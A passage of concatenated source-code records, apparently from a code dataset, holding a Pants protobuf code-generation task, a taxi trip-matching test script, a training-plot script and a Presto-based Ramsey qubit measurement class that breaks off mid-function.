ProtobufGen(CodeGen):\n\n @classmethod\n def setup_parser(cls, option_group, args, mkflag):\n option_group.add_option(mkflag('lang'), dest='protobuf_gen_langs', default=[],\n action='append', type='choice', choices=['python', 'java'],\n help='Force generation of protobuf code for these languages.')\n\n def __init__(self, *args, **kwargs):\n super(ProtobufGen, self).__init__(*args, **kwargs)\n\n self.protoc_supportdir = self.context.config.get('protobuf-gen', 'supportdir',\n default=_PROTOBUF_GEN_SUPPORTDIR_DEFAULT)\n self.protoc_version = self.context.config.get('protobuf-gen', 'version',\n default=_PROTOBUF_VERSION_DEFAULT)\n self.plugins = 
self.context.config.getlist('protobuf-gen', 'plugins', default=[])\n\n self.java_out = os.path.join(self.workdir, 'gen-java')\n self.py_out = os.path.join(self.workdir, 'gen-py')\n\n self.gen_langs = set(self.context.options.protobuf_gen_langs)\n for lang in ('java', 'python'):\n if self.context.products.isrequired(lang):\n self.gen_langs.add(lang)\n\n self.protobuf_binary = BinaryUtil(config=self.context.config).select_binary(\n self.protoc_supportdir,\n self.protoc_version,\n 'protoc'\n )\n\n # TODO https://github.com/pantsbuild/pants/issues/604 prep start\n def prepare(self, round_manager):\n super(ProtobufGen, self).prepare(round_manager)\n round_manager.require_data('ivy_imports')\n # TODO https://github.com/pantsbuild/pants/issues/604 prep finish\n\n def resolve_deps(self, key, default=[]):\n deps = OrderedSet()\n for dep in self.context.config.getlist('protobuf-gen', key, default=maybe_list(default)):\n if dep:\n try:\n deps.update(self.context.resolve(dep))\n except AddressLookupError as e:\n raise self.DepLookupError(\"{message}\\n referenced from [{section}] key: {key} in pants.ini\"\n .format(message=e, section='protobuf-gen', key=key))\n return deps\n\n @property\n def javadeps(self):\n return self.resolve_deps('javadeps',\n default=_PROTOBUF_GEN_JAVADEPS_DEFAULT\n .format(version=self.protoc_version))\n @property\n def pythondeps(self):\n return self.resolve_deps('pythondeps', default=_PROTOBUF_GEN_PYTHONDEPS_DEFAULT)\n\n def invalidate_for_files(self):\n return [self.protobuf_binary]\n\n def is_gentarget(self, target):\n return isinstance(target, JavaProtobufLibrary)\n\n def is_forced(self, lang):\n return lang in self.gen_langs\n\n def genlangs(self):\n return Target.LANG_DISCRIMINATORS\n\n def _jars_to_directories(self, target):\n \"\"\"Extracts and maps jars to directories containing their contents.\n\n :returns: a set of filepaths to directories containing the contents of jar.\n \"\"\"\n files = set()\n jarmap = self.context.products.get('ivy_imports')\n for folder, names in jarmap.by_target[target].items():\n for name in names:\n files.add(self._extract_jar(os.path.join(folder, name)))\n return files\n\n def _extract_jar(self, jar_path):\n \"\"\"Extracts the jar to a subfolder of workdir/extracted and returns the path to it.\"\"\"\n with open(jar_path, 'rb') as f:\n outdir = os.path.join(self.workdir, 'extracted', sha1(f.read()).hexdigest())\n if not os.path.exists(outdir):\n ZIP.extract(jar_path, outdir)\n self.context.log.debug('Extracting jar at {jar_path}.'.format(jar_path=jar_path))\n else:\n self.context.log.debug('Jar already extracted at {jar_path}.'.format(jar_path=jar_path))\n return outdir\n\n def _proto_path_imports(self, proto_targets):\n for target in proto_targets:\n for path in self._jars_to_directories(target):\n yield os.path.relpath(path, get_buildroot())\n\n def _same_contents(self, a, b):\n with open(a, 'r') as f:\n a_data = f.read()\n with open(b, 'r') as f:\n b_data = f.read()\n return a_data == b_data\n\n def genlang(self, lang, targets):\n sources_by_base = self._calculate_sources(targets)\n sources = reduce(lambda a,b: a^b, sources_by_base.values(), OrderedSet())\n bases = OrderedSet(sources_by_base.keys())\n bases.update(self._proto_path_imports(targets))\n\n # Check for duplicate/conflicting protos.\n sources_by_genfile = {}\n for base in sources_by_base.keys(): # Need to iterate over /original/ bases.\n for path in sources_by_base[base]:\n if not path in sources:\n continue # Check to make sure we haven't already removed it.\n source = 
path[len(base):]\n genfiles = calculate_genfiles(path, source)\n for key in genfiles.keys():\n for genfile in genfiles[key]:\n if genfile in sources_by_genfile:\n # Possible conflict!\n prev = sources_by_genfile[genfile]\n if not prev in sources:\n # Must have been culled by an earlier pass.\n continue\n if not self._same_contents(path, prev):\n self.context.log.error('Proto conflict detected (.proto files are different):')\n self.context.log.error(' 1: {prev}'.format(prev=prev))\n self.context.log.error(' 2: {curr}'.format(curr=path))\n else:\n self.context.log.warn('Proto duplication detected (.proto files are identical):')\n self.context.log.warn(' 1: {prev}'.format(prev=prev))\n self.context.log.warn(' 2: {curr}'.format(curr=path))\n self.context.log.warn(' Arbitrarily favoring proto 1.')\n if path in sources:\n sources.remove(path) # Favor the first version.\n continue\n sources_by_genfile[genfile] = path\n\n if lang == 'java':\n output_dir = self.java_out\n gen_flag = '--java_out'\n elif lang == 'python':\n output_dir = self.py_out\n gen_flag = '--python_out'\n else:\n raise TaskError('Unrecognized protobuf gen lang: %s' % lang)\n\n safe_mkdir(output_dir)\n gen = '%s=%s' % (gen_flag, output_dir)\n\n args = [self.protobuf_binary, gen]\n\n if self.plugins:\n for plugin in self.plugins:\n # TODO(Eric Ayers) Is it a good assumption that the generated source output dir is\n # acceptable for all plugins?\n args.append(\"--%s_protobuf_out=%s\" % (plugin, output_dir))\n\n for base in bases:\n args.append('--proto_path=%s' % base)\n\n args.extend(sources)\n log.debug('Executing: %s' % '\\\\\\n '.join(args))\n process = subprocess.Popen(args)\n result = process.wait()\n if result != 0:\n raise TaskError('%s ... exited non-zero (%i)' % (self.protobuf_binary, result))\n\n def _calculate_sources(self, targets):\n walked_targets = set()\n for target in targets:\n walked_targets.update(t for t in target.closure() if self.is_gentarget(t))\n\n sources_by_base = OrderedDict()\n for target in self.context.build_graph.targets():\n if target in walked_targets:\n base, sources = target.target_base, target.sources_relative_to_buildroot()\n if base not in sources_by_base:\n sources_by_base[base] = OrderedSet()\n sources_by_base[base].update(sources)\n return sources_by_base\n\n def createtarget(self, lang, gentarget, dependees):\n if lang == 'java':\n return self._create_java_target(gentarget, dependees)\n elif lang == 'python':\n return self._create_python_target(gentarget, dependees)\n else:\n raise TaskError('Unrecognized protobuf gen lang: %s' % lang)\n\n def _create_java_target(self, target, dependees):\n genfiles = []\n for source in target.sources_relative_to_source_root():\n path = os.path.join(target.target_base, source)\n genfiles.extend(calculate_genfiles(path, source).get('java', []))\n spec_path = os.path.relpath(self.java_out, get_buildroot())\n address = SyntheticAddress(spec_path, target.id)\n deps = OrderedSet(self.javadeps)\n import_jars = target.imports\n jars_tgt = self.context.add_new_target(SyntheticAddress(spec_path, target.id+str('-rjars')),\n JarLibrary,\n jars=import_jars,\n derived_from=target)\n # Add in the 'spec-rjars' target, which contains all the JarDependency targets passed in via the\n # imports parameter. 
Each of these jars is expected to contain .proto files bundled together\n # with their .class files.\n deps.add(jars_tgt)\n tgt = self.context.add_new_target(address,\n JavaLibrary,\n derived_from=target,\n sources=genfiles,\n provides=target.provides,\n dependencies=deps,\n excludes=target.payload.get_field_value('excludes'))\n for dependee in dependees:\n dependee.inject_dependency(tgt.address)\n return tgt\n\n def _create_python_target(self, target, dependees):\n genfiles = []\n for source in target.sources_relative_to_source_root():\n path = os.path.join(target.target_base, source)\n genfiles.extend(calculate_genfiles(path, source).get('py', []))\n spec_path = os.path.relpath(self.py_out, get_buildroot())\n address = SyntheticAddress(spec_path, target.id)\n tgt = self.context.add_new_target(address,\n PythonLibrary,\n derived_from=target,\n sources=genfiles,\n dependencies=self.pythondeps)\n tgt.jar_dependencies.update(target.imports)\n for dependee in dependees:\n dependee.inject_dependency(tgt.address)\n return tgt\n\n\nDEFAULT_PACKAGE_PARSER = re.compile(r'^\\s*package\\s+([^;]+)\\s*;\\s*$')\nOPTION_PARSER = re.compile(r'^\\s*option\\s+([^ =]+)\\s*=\\s*([^\\s]+)\\s*;\\s*$')\nSERVICE_PARSER = re.compile(r'^\\s*(service)\\s+([^\\s{]+).*')\nTYPE_PARSER = re.compile(r'^\\s*(enum|message)\\s+([^\\s{]+).*')\n\n\ndef camelcase(string):\n \"\"\"Convert snake casing where present to camel casing\"\"\"\n return ''.join(word.capitalize() for word in re.split('[-_]', string))\n\n\ndef calculate_genfiles(path, source):\n with open(path, 'r') as protobuf:\n lines = protobuf.readlines()\n package = ''\n filename = re.sub(r'\\.proto$', '', os.path.basename(source))\n outer_class_name = camelcase(filename)\n multiple_files = False\n outer_types = set()\n type_depth = 0\n java_package = None\n for line in lines:\n match = DEFAULT_PACKAGE_PARSER.match(line)\n if match:\n package = match.group(1)\n else:\n match = OPTION_PARSER.match(line)\n if match:\n name = match.group(1)\n value = match.group(2).strip('\"')\n if 'java_package' == name:\n java_package = value\n elif 'java_outer_classname' == name:\n outer_class_name = value\n elif 'java_multiple_files' == name:\n multiple_files = (value == 'true')\n else:\n uline = line.decode('utf-8').strip()\n type_depth += uline.count('{') - uline.count('}')\n match = SERVICE_PARSER.match(line)\n _update_type_list(match, type_depth, outer_types)\n if not match:\n match = TYPE_PARSER.match(line)\n _update_type_list(match, type_depth, outer_types)\n\n # 'option java_package' supercedes 'package'\n if java_package:\n package = java_package\n\n # TODO(Eric Ayers) replace with a real lex/parse understanding of protos. This is a big hack.\n # The parsing for finding type definitions is not reliable. 
See\n # https://github.com/pantsbuild/pants/issues/96\n types = outer_types if multiple_files and type_depth == 0 else set()\n\n genfiles = defaultdict(set)\n genfiles['py'].update(calculate_python_genfiles(source))\n genfiles['java'].update(calculate_java_genfiles(package, outer_class_name, types))\n return genfiles\n\n\ndef _update_type_list(match, type_depth, outer_types):\n if match and type_depth < 2: # This takes care of the case where { } are on the same line.\n type_name = match.group(2)\n outer_types.add(type_name)\n if match.group(1) == 'message':\n outer_types.add('%sOrBuilder' % type_name)\n\n\ndef calculate_python_genfiles(source):\n yield re.sub(r'\\.proto$', '_pb2.py', source)\n\n\ndef calculate_java_genfiles(package, outer_class_name, types):\n basepath = package.replace('.', '/')\n\n def path(name):\n return os.path.join(basepath, '%s.java' % name)\n\n yield path(outer_class_name)\n for type_ in types:\n yield path(type_)\n","sub_path":"src/python/pants/backend/codegen/tasks/protobuf_gen.py","file_name":"protobuf_gen.py","file_ext":"py","file_size_in_byte":14333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"528949648","text":"import time\nfrom random import randint\n\nfrom cb_taxi import (\n Trip,\n TripConfig,\n Driver\n)\n\n##### Initialize Trip Config #####\nTRIP_CONFIG = TripConfig()\n# Override config defaults\n# TRIP_CONFIG.set_base_fare(5)\n\n##### Initialize Trip Instances #####\n\n# Trip to Match - 1\nTRIP_TO_MATCH_1 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0495, 125.5907),\n end_node=(7.0517, 125.5903),\n seats_reserved=2,\n)\n\n# Trip to Match - 2\nTRIP_TO_MATCH_2 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0739938, 125.6126872),\n end_node=(7.0753224, 125.6132193),\n seats_reserved=2,\n)\n\n# Matching Trip (SM to Gaisano)\n# Sample route: https://www.openstreetmap.org/directions?engine=fossgis_osrm_car&route=7.0493%2C125.5885%3B7.0777%2C125.6140#map=15/7.0632/125.6002\nTRIP_MATCHING = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0493, 125.5885),\n end_node=(7.0777, 125.6140),\n seats_reserved=2,\n)\n\n# Mismatching Trip - 1\nTRIP_MISMATCHING_1 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0581343, 125.5685814),\n end_node=(7.0571582, 125.5721307),\n seats_reserved=1,\n)\n\n# Mismatching Trip - 2\nTRIP_MISMATCHING_2 = Trip(\n config=TRIP_CONFIG,\n start_node=(7.0606491, 125.5640547),\n end_node=(7.0619090, 125.5611702),\n seats_reserved=1,\n)\n\n##### Initialize Driver Instances #####\n## This is a list where we can select a\n## driver to assign for our trip to match\nDRIVERS = []\n\n# SM Ecoland -> Gaisano Bajada (Matching Driver) - can accommodate MATCHING_TRIPS\nMATCHING_DRIVER = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0491888, 125.5893258),\n is_online=True,\n available_seats=4,\n current_trip=TRIP_MATCHING\n)\n\n# Other Drivers (Mismatching Drivers)\nMISMATCHING_DRIVER_1 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0649960, 125.6017195),\n is_online=True,\n available_seats=4,\n current_trip=TRIP_MISMATCHING_1\n)\n\nMISMATCHING_DRIVER_2 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0649960, 125.6017195),\n is_online=True,\n available_seats=4,\n current_trip=TRIP_MISMATCHING_2\n)\n\n# Idle drivers\nIDLE_DRIVER_1 = Driver(\n unique_id=randint(1000, 9999),\n current_location=(7.0649960, 125.6017195),\n is_online=True,\n available_seats=5,\n current_trip=False\n)\n\nIDLE_DRIVER_2 = Driver(\n unique_id=randint(1000, 9999),\n 
current_location=(7.0491888, 125.5893258),\n is_online=True,\n available_seats=5,\n current_trip=False\n)\n\nDRIVERS.append(MATCHING_DRIVER)\nDRIVERS.append(MISMATCHING_DRIVER_1)\nDRIVERS.append(MISMATCHING_DRIVER_2)\nDRIVERS.append(IDLE_DRIVER_1)\nDRIVERS.append(IDLE_DRIVER_2)\n\n\n##### Display Drivers #####\nprint(\"\\nDRIVERS\")\nprint(\"--------------------------\")\nfor driver in DRIVERS:\n print(\"ID: {}; Location: {}; Seats Available: {}; Online: {}\".format(\n driver.unique_id,\n driver.current_location,\n driver.available_seats,\n driver.is_online\n ))\nprint(\"\\n\")\n##### TEST MODULE #####\n\nprint(\"TRIP TO MATCH DETAILS\")\nprint(\"--------------------------\")\nprint(\"Pickup: {}; DropOff: {}; Seats Reserved: {}\".format(\n TRIP_TO_MATCH_1.start_node,\n TRIP_TO_MATCH_1.end_node,\n TRIP_TO_MATCH_1.seats_reserved\n))\n\nFARE_TO_PAY_1 = TRIP_TO_MATCH_1.get_fare()\nprint(\"Fare to Pay: ${}\".format(FARE_TO_PAY_1))\n\n## GET AVAILABLE DRIVERS FOR TRIP_TO_MATCH_1 ##\nAVAILABLE_DRIVERS = TRIP_TO_MATCH_1.get_available_drivers(DRIVERS)\n\nprint(\"\\nAvailable Drivers: \")\nfor driver in AVAILABLE_DRIVERS:\n distance = round(driver.get_distance(\n TRIP_TO_MATCH_1.start_node[0],\n TRIP_TO_MATCH_1.start_node[1]\n ), 2)\n print(\"ID: {}; Location: {}; Distance: {}; Seats Available: {}; Current Trip: {} TO {}\".format(\n driver.unique_id,\n driver.current_location,\n \"{}km\".format(distance),\n driver.available_seats,\n driver.current_trip.start_node,\n driver.current_trip.end_node\n ))\n\n\n## SELECT FROM THE LIST OF AVAILABLE DRIVERS THRU QUEUING ##\nQUEUE_TIME = TRIP_CONFIG.process_time # seconds\nQUEUE_END = time.time() + QUEUE_TIME\ndriver_found = False\nfor driver in AVAILABLE_DRIVERS:\n if time.time() <= QUEUE_END:\n print(\"Accept Request? Y/N\")\n response = input()\n if response.upper() == \"Y\":\n driver_found = True\n TRIP_TO_MATCH_1.driver = driver\n break\n else:\n break\n\nif not driver_found and time.time() <= QUEUE_END:\n # IF NO DRIVER ACCEPTED THE RESPONSE,\n # INITIATE SEARCH FOR NEARBY IDLE DRIVERS\n ONLINE_DRIVERS = TRIP_TO_MATCH_1.get_online_drivers(DRIVERS)\n IDLE_DRIVERS = TRIP_TO_MATCH_1.get_idle_drivers(ONLINE_DRIVERS)\n print(\"\\nSELECTING FROM IDLE DRIVERS:\")\n for driver in IDLE_DRIVERS:\n print(\"Accept Request? 
Y/N\")\n response = input()\n if response.upper() == \"Y\":\n driver_found = True\n TRIP_TO_MATCH_1.driver = driver\n break\n\nif driver_found:\n print(\"\\nFinal Assigned Driver:\")\n\n distance = round(TRIP_TO_MATCH_1.driver.get_distance(\n TRIP_TO_MATCH_1.start_node[0],\n TRIP_TO_MATCH_1.start_node[1]\n ), 2)\n\n if TRIP_TO_MATCH_1.driver.current_trip:\n print(\"ID: {}; Location: {}; Distance: {}; Seats Available: {}; Current Trip: {} TO {}\".format(\n TRIP_TO_MATCH_1.driver.unique_id,\n TRIP_TO_MATCH_1.driver.current_location,\n \"{}km\".format(distance),\n TRIP_TO_MATCH_1.driver.available_seats,\n TRIP_TO_MATCH_1.driver.current_trip.start_node,\n TRIP_TO_MATCH_1.driver.current_trip.end_node\n ))\n else:\n print(\"ID: {}; Location: {}; Distance: {}; Seats Available: {}; Trip: No Ongoing Trip\".format(\n TRIP_TO_MATCH_1.driver.unique_id,\n TRIP_TO_MATCH_1.driver.current_location,\n \"{}km\".format(distance),\n TRIP_TO_MATCH_1.driver.available_seats,\n ))\nelse:\n print(\"No driver found for this trip.\")\n\n\n##### MISC FUNCTIONS #####\n\n# Get the node value of a lat/long pair\n# NODE_VALUE = TRIP_TO_MATCH_1.get_node(7.0649960, 125.6017195)\n","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"449048185","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport argparse\nimport json\n\ndef plot_accuracies(losses, accuracy_train, accuracy_test, accuracy_per_label, labels):\n ax = plt.subplot(111)\n ax.plot(losses, color='r', label=\"loss\")\n ax.plot(accuracy_test, color='b', label=\"test accuracy\")\n ax.plot(accuracy_train, color='y', label=\"train accuracy\")\n\n ax.legend()\n plt.show()\n ax = plt.subplot(111)\n for i in range(len(accuracy_per_label)):\n ax.plot(accuracy_per_label[i], label=labels[i])\n ax.legend()\n plt.show()\n\ndef main():\n parser = argparse.ArgumentParser(description='Display plot outputs from training')\n parser.add_argument('plotdata',\n metavar='P',\n type=str,\n nargs='?',\n default='./plots/plot_data.json',\n help=\"The path to the plot data\")\n args = parser.parse_args()\n\n with tf.gfile.FastGFile(args.plotdata, 'r') as f:\n plot_data = json.loads(f.read())\n\n plot_accuracies(**plot_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train/trainer/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"78856461","text":"# -*- coding: utf-8 -*-\n\"\"\"Measure Ramsey oscillations by changing the delay between two π/2 pulses.\n\nFit detuning of control drive frequency from qubit, and T2*. 
The control pulse has a sin^2 envelope, while the readout\npulse is square.\n\n\"\"\"\nimport ast\nfrom typing import List\n\nimport h5py\nimport numpy as np\n\nfrom presto.hardware import AdcFSample, AdcMode, DacFSample, DacMode\nfrom presto import pulsed\nfrom presto.utils import rotate_opt, sin2\n\nfrom _base import Base\n\nDAC_CURRENT = 32_000 # uA\nCONVERTER_CONFIGURATION = {\n \"adc_mode\": AdcMode.Mixed,\n \"adc_fsample\": AdcFSample.G4,\n \"dac_mode\": [DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.Mixed02],\n \"dac_fsample\": [DacFSample.G10, DacFSample.G6, DacFSample.G6, DacFSample.G6],\n}\nIDX_LOW = 1_500\nIDX_HIGH = 2_000\n\n\nclass RamseySingle(Base):\n def __init__(\n self,\n readout_freq: float,\n control_freq: float,\n readout_amp: float,\n control_amp: float,\n readout_duration: float,\n control_duration: float,\n sample_duration: float,\n delay_arr: List[float],\n readout_port: int,\n control_port: int,\n sample_port: int,\n wait_delay: float,\n readout_sample_delay: float,\n num_averages: int,\n jpa_params: dict = None,\n drag: float = 0.0,\n ) -> None:\n self.readout_freq = readout_freq\n self.control_freq = control_freq\n self.readout_amp = readout_amp\n self.control_amp = control_amp\n self.readout_duration = readout_duration\n self.control_duration = control_duration\n self.sample_duration = sample_duration\n self.delay_arr = np.atleast_1d(delay_arr).astype(np.float64)\n self.readout_port = readout_port\n self.control_port = control_port\n self.sample_port = sample_port\n self.wait_delay = wait_delay\n self.readout_sample_delay = readout_sample_delay\n self.num_averages = num_averages\n self.jpa_params = jpa_params\n self.drag = drag\n\n self.t_arr = None # replaced by run\n self.store_arr = None # replaced by run\n\n def run(\n self,\n presto_address: str,\n presto_port: int = None,\n ext_ref_clk: bool = False,\n ) -> str:\n # Instantiate interface class\n with pulsed.Pulsed(\n address=presto_address,\n port=presto_port,\n ext_ref_clk=ext_ref_clk,\n **CONVERTER_CONFIGURATION,\n ) as pls:\n assert pls.hardware is not None\n\n pls.hardware.set_adc_attenuation(self.sample_port, 0.0)\n pls.hardware.set_dac_current(self.readout_port, DAC_CURRENT)\n pls.hardware.set_dac_current(self.control_port, DAC_CURRENT)\n pls.hardware.set_inv_sinc(self.readout_port, 0)\n pls.hardware.set_inv_sinc(self.control_port, 0)\n pls.hardware.configure_mixer(\n freq=self.readout_freq,\n in_ports=self.sample_port,\n out_ports=self.readout_port,\n sync=False, # sync in next call\n )\n pls.hardware.configure_mixer(\n freq=self.control_freq,\n out_ports=self.control_port,\n sync=True, # sync here\n )\n if self.jpa_params is not None:\n pls.hardware.set_lmx(\n self.jpa_params[\"pump_freq\"],\n self.jpa_params[\"pump_pwr\"],\n self.jpa_params[\"pump_port\"],\n )\n pls.hardware.set_dc_bias(self.jpa_params[\"bias\"], self.jpa_params[\"bias_port\"])\n pls.hardware.sleep(1.0, False)\n\n # ************************************\n # *** Setup measurement parameters ***\n # ************************************\n\n # Setup lookup tables for frequencies\n # we only need to use carrier 1\n pls.setup_freq_lut(\n output_ports=self.readout_port,\n group=0,\n frequencies=0.0,\n phases=0.0,\n phases_q=0.0,\n )\n pls.setup_freq_lut(\n output_ports=self.control_port,\n group=0,\n frequencies=0.0,\n phases=0.0,\n phases_q=0.0,\n )\n\n # Setup lookup tables for amplitudes\n pls.setup_scale_lut(\n output_ports=self.readout_port,\n group=0,\n scales=self.readout_amp,\n )\n pls.setup_scale_lut(\n 
output_ports=self.control_port,\n group=0,\n scales=self.control_amp,\n )\n\n # Setup readout and control pulses\n # use setup_long_drive to create a pulse with square envelope\n # setup_long_drive supports smooth rise and fall transitions for the pulse,\n # but we keep it simple here\n readout_pulse = pls.setup_long_drive(\n output_port=self.readout_port,\n group=0,\n duration=self.readout_duration,\n amplitude=1.0,\n amplitude_q=1.0,\n rise_time=0e-9,\n fall_time=0e-9,\n )\n control_ns = int(\n round(self.control_duration * pls.get_fs(\"dac\"))\n ) # number of samples in the control template\n control_envelope = sin2(control_ns, drag=self.drag)\n control_pulse = pls.setup_template(\n output_port=self.control_port,\n group=0,\n template=control_envelope,\n template_q=control_envelope if self.drag == 0.0 else None,\n envelope=True,\n )\n\n # Setup sampling window\n pls.set_store_ports(self.sample_port)\n pls.set_store_duration(self.sample_duration)\n\n # ******************************\n # *** Program pulse sequence ***\n # ******************************\n T = 0.0 # s, start at time zero ...\n for delay in self.delay_arr:\n # first pi/2 pulse\n pls.reset_phase(T, self.control_port)\n pls.output_pulse(T, control_pulse)\n T += self.control_duration\n # Ramsey delay\n T += delay\n # second pi/2 pulse\n pls.output_pulse(T, control_pulse)\n T += self.control_duration\n # Readout\n pls.reset_phase(T, self.readout_port)\n pls.output_pulse(T, readout_pulse)\n pls.store(T + self.readout_sample_delay)\n T += self.readout_duration\n # Move to next iteration, waiting for decay\n T += self.wait_delay\n\n if self.jpa_params is not None:\n # adjust period to minimize effect of JPA idler\n idler_freq = self.jpa_params[\"pump_freq\"] - self.readout_freq\n idler_if = abs(idler_freq - self.readout_freq) # NCO at readout_freq\n idler_period = 1 / idler_if\n T_clk = int(round(T * pls.get_clk_f()))\n idler_period_clk = int(round(idler_period * pls.get_clk_f()))\n # first make T a multiple of idler period\n if T_clk % idler_period_clk > 0:\n T_clk += idler_period_clk - (T_clk % idler_period_clk)\n # then make it off by one clock cycle\n T_clk += 1\n T = T_clk * pls.get_clk_T()\n\n # **************************\n # *** Run the experiment ***\n # **************************\n pls.run(\n period=T,\n repeat_count=1,\n num_averages=self.num_averages,\n print_time=True,\n )\n self.t_arr, self.store_arr = pls.get_store_data()\n\n if self.jpa_params is not None:\n pls.hardware.set_lmx(0.0, 0.0, self.jpa_params[\"pump_port\"])\n pls.hardware.set_dc_bias(0.0, self.jpa_params[\"bias_port\"])\n\n return self.save()\n\n def save(self, save_filename: str = None) -> str:\n return super().save(__file__, save_filename=save_filename)\n\n @classmethod\n def load(cls, load_filename: str) -> \"RamseySingle\":\n with h5py.File(load_filename, \"r\") as h5f:\n readout_freq = h5f.attrs[\"readout_freq\"]\n control_freq = h5f.attrs[\"control_freq\"]\n readout_amp = h5f.attrs[\"readout_amp\"]\n control_amp = h5f.attrs[\"control_amp\"]\n readout_duration = h5f.attrs[\"readout_duration\"]\n control_duration = h5f.attrs[\"control_duration\"]\n sample_duration = h5f.attrs[\"sample_duration\"]\n delay_arr = h5f[\"delay_arr\"][()]\n readout_port = h5f.attrs[\"readout_port\"]\n control_port = h5f.attrs[\"control_port\"]\n sample_port = h5f.attrs[\"sample_port\"]\n wait_delay = h5f.attrs[\"wait_delay\"]\n readout_sample_delay = h5f.attrs[\"readout_sample_delay\"]\n num_averages = h5f.attrs[\"num_averages\"]\n\n jpa_params = 
ast.literal_eval(h5f.attrs[\"jpa_params\"])\n\n t_arr = h5f[\"t_arr\"][()]\n store_arr = h5f[\"store_arr\"][()]\n\n try:\n drag = h5f.attrs[\"drag\"]\n except KeyError:\n drag = 0.0\n\n self = cls(\n readout_freq=readout_freq,\n control_freq=control_freq,\n readout_amp=readout_amp,\n control_amp=control_amp,\n readout_duration=readout_duration,\n control_duration=control_duration,\n sample_duration=sample_duration,\n delay_arr=delay_arr,\n readout_port=readout_port,\n control_port=control_port,\n sample_port=sample_port,\n wait_delay=wait_delay,\n readout_sample_delay=readout_sample_delay,\n num_averages=num_averages,\n jpa_params=jpa_params,\n drag=drag,\n )\n self.t_arr = t_arr\n self.store_arr = store_arr\n\n return self\n\n def analyze(self, all_plots: bool = False):\n if self.t_arr is None:\n raise RuntimeError\n if self.store_arr is None:\n raise RuntimeError\n\n import matplotlib.pyplot as plt\n\n ret_fig = []\n\n idx = np.arange(IDX_LOW, IDX_HIGH)\n t_low = self.t_arr[IDX_LOW]\n t_high = self.t_arr[IDX_HIGH]\n\n if all_plots:\n # Plot raw store data for first iteration as a check\n fig1, ax1 = plt.subplots(2, 1, sharex=True, tight_layout=True)\n ax11, ax12 = ax1\n ax11.axvspan(1e9 * t_low, 1e9 * t_high, facecolor=\"#dfdfdf\")\n ax12.axvspan(1e9 * t_low, 1e9 * t_high, facecolor=\"#dfdfdf\")\n ax11.plot(1e9 * self.t_arr, np.abs(self.store_arr[0, 0, :]))\n ax12.plot(1e9 * self.t_arr, np.angle(self.store_arr[0, 0, :]))\n ax12.set_xlabel(\"Time [ns]\")\n fig1.show()\n ret_fig.append(fig1)\n\n # Analyze T2\n resp_arr = np.mean(self.store_arr[:, 0, idx], axis=-1)\n data = rotate_opt(resp_arr)\n\n # Fit data to I quadrature\n try:\n popt, perr = _fit_simple(self.delay_arr, np.real(data))\n\n T2 = popt[2]\n T2_err = perr[2]\n print(\"T2 time: {} +- {} us\".format(1e6 * T2, 1e6 * T2_err))\n det = popt[3]\n det_err = perr[3]\n print(\"detuning: {} +- {} Hz\".format(det, det_err))\n\n success = True\n except Exception as err:\n print(\"Unable to fit data!\")\n print(err)\n success = False\n\n if all_plots:\n fig2, ax2 = plt.subplots(4, 1, sharex=True, figsize=(6.4, 6.4), tight_layout=True)\n ax21, ax22, ax23, ax24 = ax2\n ax21.plot(1e6 * self.delay_arr, np.abs(data))\n ax22.plot(1e6 * self.delay_arr, np.unwrap(np.angle(data)))\n ax23.plot(1e6 * self.delay_arr, np.real(data))\n if success:\n ax23.plot(1e6 * self.delay_arr, _func(self.delay_arr, *popt), \"--\")\n ax24.plot(1e6 * self.delay_arr, np.imag(data))\n\n ax21.set_ylabel(\"Amplitude [FS]\")\n ax22.set_ylabel(\"Phase [rad]\")\n ax23.set_ylabel(\"I [FS]\")\n ax24.set_ylabel(\"Q [FS]\")\n ax2[-1].set_xlabel(\"Ramsey delay [us]\")\n fig2.show()\n ret_fig.append(fig2)\n\n data_max = np.abs(data.real).max()\n unit = \"\"\n mult = 1.0\n if data_max < 1e-6:\n unit = \"n\"\n mult = 1e9\n elif data_max < 1e-3:\n unit = \"μ\"\n mult = 1e6\n elif data_max < 1e0:\n unit = \"m\"\n mult = 1e3\n\n fig3, ax3 = plt.subplots(tight_layout=True)\n ax3.plot(1e6 * self.delay_arr, mult * np.real(data), \".\")\n ax3.set_ylabel(f\"I quadrature [{unit:s}FS]\")\n ax3.set_xlabel(\"Ramsey delay [μs]\")\n if success:\n ax3.plot(1e6 * self.delay_arr, mult * _func(self.delay_arr, *popt), \"--\")\n ax3.set_title(f\"T2* = {1e6*T2:.0f} ± {1e6*T2_err:.0f} μs\")\n fig3.show()\n ret_fig.append(fig3)\n\n return ret_fig\n\n\ndef _func(t, offset, amplitude, T2, frequency, phase):\n return offset + amplitude * np.exp(-t / T2) * np.cos(2.0 * np.pi * frequency * t + phase)\n\n\ndef _fit_simple(x, y):\n from scipy.optimize import curve_fit\n\n pkpk = np.max(y) - np.min(y)\n offset = 
